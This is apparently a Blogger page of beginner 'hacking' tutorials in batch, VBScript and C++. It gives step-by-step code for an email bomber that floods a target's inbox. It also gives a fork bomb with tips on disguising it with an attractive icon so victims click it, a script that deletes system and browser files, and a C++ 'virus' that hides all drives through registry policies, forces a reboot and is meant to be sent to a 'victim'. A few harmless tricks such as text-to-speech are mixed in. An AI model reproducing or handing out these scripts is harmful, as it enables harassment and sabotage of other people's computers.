This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

‏إظهار الرسائل ذات التسميات Batch Programs. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات Batch Programs. إظهار كافة الرسائل

الثلاثاء، 7 يناير 2014

EMAIL Bomber in Batch

EMAIL BOMBER

Here is a script with the help of which you can flood your friends mail box with an infinite number of emails.
for doing this you have to follow the following steps.

Step 1: Open notepad
Step 2: Copy the code given below and paste in to the notepad
Dim value
value=1
on error resume next
Const schema   = "http://schemas.microsoft.com/cdo/configuration/"
Const cdoBasic = 1
Const cdoSendUsingPort = 2
Dim oMsg, oConf
' E-mail properties
Set oMsg      = CreateObject("CDO.Message")
oMsg.From     = "sender@gmail.com"
oMsg.To       = "reciever@mail.com"
oMsg.Subject  = "message subject what u want"
oMsg.TextBody = "If you can read this, the script worked!"
' GMail SMTP server configuration and authentication info
do
Set oConf = oMsg.Configuration
oConf.Fields(schema & "smtpserver")       = "smtp.gmail.com" 'server address
oConf.Fields(schema & "smtpserverport")   = 465              'port number
oConf.Fields(schema & "sendusing")        = cdoSendUsingPort
oConf.Fields(schema & "smtpauthenticate") = cdoBasic         'authentication type
oConf.Fields(schema & "smtpusessl")       = True             'use SSL encryption
oConf.Fields(schema & "sendusername")  = "sender@gmail.com" 'senderusername
oConf.Fields(schema & "sendpassword")     = "password"      'sender password
oConf.Fields.Update()
' send message
oMsg.Send()
Loop Until value=2
Step 3: In the above code edit the sender's and receiver's email id and senders password..
Step 4: Now save the file as "something.vbs"
Step 5: All done now just double click on your something.vbs file and see the results.

NOTE : here in this code senders id must be in gmail.com for if senders email id other than gmail then you have to configure server configuration accordingly...
Change the loop value as you want ..

Like yahoo 


Yahoo
POP3: pop.mail.yahoo.comSMTP: smtp.mail.yahoo.com
POP3 PORT :110SMTP PORT: 25
Note: You must subscribe to Yahoo's Premium service to access your email via POP, free accounts can not use this option.
Just google the mail service port number
Ex: hotmail port number 


السبت، 16 نوفمبر 2013

Generate Number Dictonary in cmd



 If you want to make your own list you can do the following.
 Run CMD as administrator>
type "cd\" then press enter>then "doskey" then press enter. This will make it faster.
 Now for the list you want you want to put in
"for /L %i in (000000,1,999999) do @echo %i >>List999999.txt"
 When its done the file will be in your c: drive.

In (000000,1,999999) the '000000' is the start number, '1' is the interval it moves by, '999999' is the stop number. I'll edit the and put a link when its done rendering.

الجمعة، 15 نوفمبر 2013

To make n number of Folders

Heyy Guys Today I'm gonna Show uhh how to create n number of Folders 
Letz get Started  
Open Cmd
Choose Location where you want to create Folders 
Synatx :
for /l %i in (1,1,100) do mkdir hacked%i

Just Copy the above Code and Paste in Cmd to make 100 folders ...
Here (1,1,100)
1 : is starting Number
1 : is Increment of Numbers 
100 : is  how many Folders we want
Enjoy !! 

الاثنين، 11 نوفمبر 2013

Convert text into audio using notepad.......


# Notepad : a simple programme. But we can do
lot's of things with this. we gave you more tricks
from notepad here before. Today i going to tell
notepad trick. If you want to convert your text
in to audio you have to use any programmes.
But from this method you don't want to use
another software. An easy trick from Notepad.
Let's start.
1.Open notepad.
2.Copy the code bellow.
Dim msg, sapi
msg=InputBox("Enter your text for Conversation
| Tool by kartik'stechworld","Text-To-Audio
Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
3.Now save it as text_audio.vbs
4.And that's it.
5.Now open the file and type anything. Then
click OK.

السبت، 19 أكتوبر 2013

Create a virus to make the computer freezed using Batch Programming

Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school. :P
It only for Educational Purpose  -_-
  This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.

Open a notepad.




  • copy this code to notepad:

%0|%0

  • Save the file with .bat extension(For eg: music.bat)
  • That's all once your victim clicked this file,the CPU will be overloaded.
  • Don't worry it will be come to normal operation after restarting.

If you are doing this in your college or school,you can try this:

  • copy this bat file to any drive.
  • Create shortcut to desktop(by right click and sent to desktop).
  • Now go to desktop and right click on the shortcut.
  • Select Properties.
  • Click the Change icon.
  • Select any icon which will attract users.
  • and click ok.

Screen shots for reference:




Create a virus to create a infinite folder in a drive


Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Save the file with .bat extension(for eg: folderscreate.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is.

Virus to Delete mouse,explore,logoff using Batch Programming

This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.




@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
Save it as anyname.bat

C++ ,Batch Virus code to disable All Hard disk






Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself. 
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

الثلاثاء، 10 سبتمبر 2013

Create a virus to create a infinite folder in a drive

Create a virus to create a infinite folder in a drive


Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop
Save the file with .bat extension(for eg: folderscreate.bat)
That’s all if you double click the file it will create a finite folder wherever the batch file is.